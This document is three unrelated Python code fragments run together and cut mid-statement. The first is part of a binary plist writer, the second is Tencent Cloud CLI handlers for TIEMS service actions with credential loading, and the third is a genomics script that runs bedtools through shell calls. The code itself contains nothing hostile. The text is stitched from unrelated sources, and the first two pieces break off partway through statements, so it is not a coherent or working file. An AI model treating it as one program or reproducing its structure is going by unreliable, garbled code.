elif isinstance(obj, BoolWrapper):
if obj.value is False:
output += pack('!B', 0b00001000)
else:
output += pack('!B', 0b00001001)
elif isinstance(obj, Uid):
size = self.intSize(obj)
output += pack('!B', (0b1000 << 4) | size - 1)
output += self.binaryInt(obj)
elif isinstance(obj, (int, long)):
byteSize = self.intSize(obj)
root = math.log(byteSize, 2)
output += pack('!B', (0b0001 << 4) | int(root))
output += self.binaryInt(obj, as_number=True)
elif isinstance(obj, FloatWrapper):
# just use doubles
output += pack('!B', (0b0010 << 4) | 3)
output += self.binaryReal(obj)
elif isinstance(obj, datetime.datetime):
timestamp = (obj - apple_reference_date).total_seconds()
output += pack('!B', 0b00110011)
output += pack('!d', float(timestamp))
elif isinstance(obj, Data):
output += proc_variable_length(0b0100, len(obj))
output += obj
elif isinstance(obj, unicode):
byteData = obj.encode('utf_16_be')
output += proc_variable_length(0b0110, len(byteData)//2)
output += byteData
elif isinstance(obj, bytes):
output += proc_variable_length(0b0101, len(obj))
output += obj
elif isinstance(obj, HashableWrapper):
obj = obj.value
if isinstance(obj, (set, list, tuple)):
if isinstance(obj, set):
output += proc_variable_length(0b1100, len(obj))
else:
output += proc_variable_length(0b1010, len(obj))
objectsToWrite = []
for objRef in obj:
(isNew, output) = self.writeObjectReference(objRef, output)
if isNew:
objectsToWrite.append(objRef)
for objRef in objectsToWrite:
output = self.writeObject(objRef, output, setReferencePosition=True)
elif isinstance(obj, dict):
output += proc_variable_length(0b1101, len(obj))
keys = []
values = []
objectsToWrite = []
for key, value in iteritems(obj):
keys.append(key)
values.append(value)
for key in keys:
(isNew, output) = self.writeObjectReference(key, output)
if isNew:
objectsToWrite.append(key)
for value in values:
(isNew, output) = self.writeObjectReference(value, output)
if isNew:
objectsToWrite.append(value)
for objRef in objectsToWrite:
output = self.writeObject(objRef, output, setReferencePosition=True)
return output
def writeOffsetTable(self, output):
"""Writes all of the object reference offsets."""
all_positions = []
writtenReferences = list(self.writtenReferences.items())
writtenReferences.sort(key=lambda x: x[1])
for obj,order in writtenReferences:
# Porting note: Elsewhere we deliberately replace empty unicdoe strings
# with empty binary strings, but the empty unicode string
# goes into writtenReferences. This isn't an issue in Py2
# because u'' and b'' have the same hash; but it is in
# Py3, where they don't.
if bytes != str and obj == unicodeEmpty:
obj = b''
position = self.referencePositions.get(obj)
if position is None:
raise InvalidPlistException("Error while writing offsets table. Object not found. %s" % obj)
output += self.binaryInt(position, self.trailer.offsetSize)
all_positions.append(position)
return output
def binaryReal(self, obj):
# just use doubles
result = pack('>d', obj.value)
return result
def binaryInt(self, obj, byteSize=None, as_number=False):
result = b''
if byteSize is None:
byteSize = self.intSize(obj)
if byteSize == 1:
result += pack('>B', obj)
elif byteSize == 2:
result += pack('>H', obj)
elif byteSize == 4:
result += pack('>L', obj)
elif byteSize == 8:
if as_number:
result += pack('>q', | |
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TiemsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateJobRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.CreateJob(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteResourceGroup(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TiemsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteResourceGroupRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DeleteResourceGroup(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteRuntime(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TiemsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteRuntimeRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DeleteRuntime(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doExposeService(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TiemsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ExposeServiceRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.ExposeService(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteJob(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TiemsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteJobRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DeleteJob(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doEnableRsgAsGroup(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TiemsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.EnableRsgAsGroupRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.EnableRsgAsGroup(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeServiceConfigs(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TiemsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeServiceConfigsRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeServiceConfigs(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeRsgAsGroups(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TiemsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeRsgAsGroupsRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeRsgAsGroups(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
CLIENT_MAP = {
"v20190416": tiems_client_v20190416,
}
MODELS_MAP = {
"v20190416": models_v20190416,
}
ACTION_MAP = {
"CreateService": doCreateService,
"CreateServiceConfig": doCreateServiceConfig,
"CreateRsgAsGroup": doCreateRsgAsGroup,
"DeleteInstance": doDeleteInstance,
"DeleteService": doDeleteService,
"DeleteRsgAsGroup": doDeleteRsgAsGroup,
"UpdateRsgAsGroup": doUpdateRsgAsGroup,
"DeleteServiceConfig": doDeleteServiceConfig,
"DisableRsgAsGroup": doDisableRsgAsGroup,
"UpdateService": doUpdateService,
"CreateRuntime": doCreateRuntime,
"DescribeServices": doDescribeServices,
"DescribeInstances": doDescribeInstances,
"DescribeResourceGroups": doDescribeResourceGroups,
"DescribeRuntimes": doDescribeRuntimes,
"DescribeRsgAsGroupActivities": doDescribeRsgAsGroupActivities,
"UpdateJob": doUpdateJob,
"CreateJob": doCreateJob,
"DeleteResourceGroup": doDeleteResourceGroup,
"DeleteRuntime": doDeleteRuntime,
"ExposeService": doExposeService,
"DeleteJob": doDeleteJob,
"EnableRsgAsGroup": doEnableRsgAsGroup,
"DescribeServiceConfigs": doDescribeServiceConfigs,
"DescribeRsgAsGroups": doDescribeRsgAsGroups,
}
AVAILABLE_VERSION_LIST = [
"v20190416",
]
def action_caller():
return ACTION_MAP
def parse_global_arg(parsed_globals):
g_param = parsed_globals
is_exist_profile = True
if not parsed_globals["profile"]:
is_exist_profile = False
g_param["profile"] = "default"
configure_path = os.path.join(os.path.expanduser("~"), ".tccli")
is_conf_exist, conf_path = Utils.file_existed(configure_path, g_param["profile"] + ".configure")
is_cred_exist, cred_path = Utils.file_existed(configure_path, g_param["profile"] + ".credential")
conf = {}
cred = {}
if is_conf_exist:
conf = Utils.load_json_msg(conf_path)
if is_cred_exist:
cred = Utils.load_json_msg(cred_path)
if not (isinstance(conf, dict) and isinstance(cred, dict)):
raise ConfigurationError(
"file: %s or %s is not json format"
% (g_param["profile"] + ".configure", g_param["profile"] + | |
<filename>bin/pre_scripts/snapshot_v.0.2.py<gh_stars>1-10
import os
import numpy as np
from subprocess import call
from collections import Counter
from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis
################################################################################################
### read 2d array
def read2d_array(filename,dtype_used):
data=open(filename,'r')
data0=[]
for records in data:
tmp = [x.strip() for x in records.split('\t')]
data0.append(tmp)
data0 = np.array(data0,dtype=dtype_used)
data.close()
return data0
################################################################################################
### write 2d matrix
def write2d_array(array,output):
r1=open(output,'w')
for records in array:
for i in range(0,len(records)-1):
r1.write(str(records[i])+'\t')
r1.write(str(records[len(records)-1])+'\n')
r1.close()
################################################################################################
### get convert bedtools window output to matrix of pk and intersect function label info
def function_label_info(input_bedtools_window, id_col, lb_col, pk_col, function_col):
#data_info_matrix = function_label_info(mark_bed_file+'.tmp01.txt', 4, 9, 2, 6)
data_info0=open(input_bedtools_window, 'r')
### read DNA region orders
data_info=[]
for records in data_info0:
tmp=[x.strip() for x in records.split('\t')]
### get intersect region; midpoint dist; TF peak length
if ((int(tmp[function_col-1]) - int(tmp[pk_col-1]))>=0) and ((int(tmp[function_col]) - int(tmp[pk_col]))<=0) :
### function Bin >= pk region
tmp_vec = [ tmp[id_col-1], tmp[lb_col-1], int(tmp[function_col])-int(tmp[function_col-1]), (float(tmp[function_col])+float(tmp[function_col-1])-float(tmp[pk_col])-float(tmp[pk_col-1]))/2, int(tmp[function_col])-int(tmp[function_col-1]) ]
elif ((int(tmp[function_col-1]) - int(tmp[pk_col-1]))<0) and ((int(tmp[function_col]) - int(tmp[pk_col]))>0) :
### function Bin < pk region
tmp_vec = [ tmp[id_col-1], tmp[lb_col-1], int(tmp[pk_col])-int(tmp[pk_col-1]), (float(tmp[function_col])+float(tmp[function_col-1])-float(tmp[pk_col])-float(tmp[pk_col-1]))/2, int(tmp[function_col])-int(tmp[function_col-1]) ]
elif ((int(tmp[function_col-1]) - int(tmp[pk_col-1]))<0) and ((int(tmp[function_col]) - int(tmp[pk_col]))<=0) :
### function Bin upstream < pk region upstream & function Bin downstream <= pk region downstream
tmp_vec = [ tmp[id_col-1], tmp[lb_col-1], int(tmp[function_col])-int(tmp[pk_col-1]), (float(tmp[function_col])+float(tmp[function_col-1])-float(tmp[pk_col])-float(tmp[pk_col-1]))/2, int(tmp[function_col])-int(tmp[function_col-1]) ]
elif ((int(tmp[function_col-1]) - int(tmp[pk_col-1]))>=0) and ((int(tmp[function_col]) - int(tmp[pk_col]))>0) :
### function Bin upstream >= pk region upstream & function Bin downstream > pk region downstream
tmp_vec = [ tmp[id_col-1], tmp[lb_col-1], int(tmp[pk_col])-int(tmp[function_col-1]), (float(tmp[function_col])+float(tmp[function_col-1])-float(tmp[pk_col])-float(tmp[pk_col-1]))/2, int(tmp[function_col])-int(tmp[function_col-1]) ]
data_info.append(tmp_vec)
data_info0.close()
###### return output dict
return (data_info)
################################################################################################
### get peak's function labels
def get_cRE_function_state(data_info_matrix, id_col, lb_col, cover_col, middist_col, functionlen, bed_od_file, bed_od_idcol, outputname):
### read DNA region function state info matrix
pk_id_list = []
data_function1={}
data_function1_maxcover={} ### coverage size
data_function1_middist={} ### midpoint dist
data_function1_statelen={} ### function state len
### initialize problem counter
k=0
for info in data_info_matrix:
pk_id = info[id_col-1]
lb_tmp = info[lb_col-1]
### creat pk_id_list for keeping the id order in output
pk_id_list.append(pk_id)
if not (pk_id in data_function1):
data_function1[pk_id] = lb_tmp
data_function1_maxcover[pk_id] = info[cover_col-1]
data_function1_middist[pk_id] = info[middist_col-1]
data_function1_statelen[pk_id] = info[functionlen-1]
elif (lb_tmp!='0') and (data_function1[pk_id]=='0'):
### if interesect non-0-state, use non-0-state replace 0 state
data_function1[pk_id] = lb_tmp
data_function1_maxcover[pk_id] = info[cover_col-1]
data_function1_middist[pk_id] = info[middist_col-1]
data_function1_statelen[pk_id] = info[functionlen-1]
elif info[cover_col-1] > data_function1_maxcover[pk_id] and lb_tmp!='0':
### if multiple cover; select the highest covering state
data_function1[pk_id] = lb_tmp
data_function1_maxcover[pk_id] = info[cover_col-1]
data_function1_middist[pk_id] = info[middist_col-1]
data_function1_statelen[pk_id] = info[functionlen-1]
elif info[cover_col-1] == data_function1_maxcover[pk_id]: ### if 2 states cover the same region with same length
if info[middist_col-1] < data_function1_middist[pk_id] and lb_tmp!='0':
### if cover the same; check mid point distance
data_function1[pk_id] = lb_tmp
data_function1_maxcover[pk_id] = info[cover_col-1]
data_function1_middist[pk_id] = info[middist_col-1]
data_function1_statelen[pk_id] = info[functionlen-1]
elif info[middist_col-1] == data_function1_middist[pk_id]: ### if 2 states cover the same region with same length; with same midpoint dist
if info[functionlen-1] < data_function1_statelen[pk_id] and lb_tmp!='0':
### if cover same & mid point distance same; check state len
data_function1[pk_id] = lb_tmp
data_function1_maxcover[pk_id] = info[cover_col-1]
data_function1_middist[pk_id] = info[middist_col-1]
data_function1_statelen[pk_id] = info[functionlen-1]
else: ### if 2 states cover the same region with same length; with same midpoint dist; with same state length ...give attention!
k=k+1
print('problem!')
print(k)
### read original bed file to get the pk id list
bed_od_file=open(bed_od_file,'r')
bed_od_id_list = []
for records in bed_od_file:
bed_od_id_list.append(records.split()[bed_od_idcol-1])
bed_od_file.close()
### write function label output
result=open(outputname,'w')
for pkid in bed_od_id_list:
if pkid in data_function1:
tmp=data_function1[pkid]
result.write(tmp+'\n')
else:
tmp=records
result.write('NA'+'\n')
result.close()
################################################################################################
### get index/signal matrix
def get_mark_matrix(peak_bed, peak_info_column, mark_list, output_file, method, sort_sigbed, script_folder, signal_col=None):
### sort input bed files
sort_bed_file = peak_bed + '.sort.bed'
call('cp ' + sort_bed_file + ' ' + output_file, shell=True)
##############################
### generate index mark matrix
mark_list_vec = open(mark_list, 'r')
celltype_list = []
for mark_bed in mark_list_vec:
tmp = [x.strip() for x in mark_bed.split('\t')]
### read bianry label file list
mark_bed_file = tmp[0]
print(mark_bed_file)
### add cell type name to cell type list
celltype_list.append(tmp[1])
#######
### sort bianry label bed files
if sort_sigbed == 'T':
call('sort -k1,1 -k2,2n ' + mark_bed_file + ' > ' + mark_bed_file+'.sort.bed', shell=True)
else:
call('cp ' + mark_bed_file + ' ' + mark_bed_file+'.sort.bed', shell=True)
#######
### use bedtools to generate the index/signal matrix
if method == 'intersect':
### used bedtools intersect to get the binary label of each peak
call(script_folder + 'bedtools2/bin/' + 'bedtools intersect -c -a ' + sort_bed_file + ' -b ' + mark_bed_file+'.sort.bed' + ' > ' + mark_bed_file+'.tmp01.txt', shell=True)
elif method == 'map':
### used bedtools map to get the average signal of each peak
call(script_folder + 'bedtools2/bin/' + 'bedtools map -c ' + str(signal_col) + ' -null 0 -o mean -a ' + sort_bed_file + ' -b ' + mark_bed_file+'.sort.bed' + ' > ' + mark_bed_file+'.tmp01.txt', shell=True)
elif method == 'window':
### used bedtools map to get the average signal of each peak
call(script_folder + 'bedtools2/bin/' + 'bedtools window -a ' + sort_bed_file + ' -b ' + mark_bed_file+'.sort.bed' + ' -w 0 > ' + mark_bed_file+'.tmp01.txt', shell=True)
### convert bedtools window output to matrix of pk and intersect function label info (intersect region; midpoint dist; TF peak length)
data_info_matrix = function_label_info(mark_bed_file+'.tmp01.txt', 4, 9, 2, 6)
### get peak's function labels based on intersect region; midpoint dist; TF peak length
get_cRE_function_state(data_info_matrix, 1, 2, 3, 4, 5, sort_bed_file, 4, mark_bed_file+'.tmp01.txt')
### cut the map number column
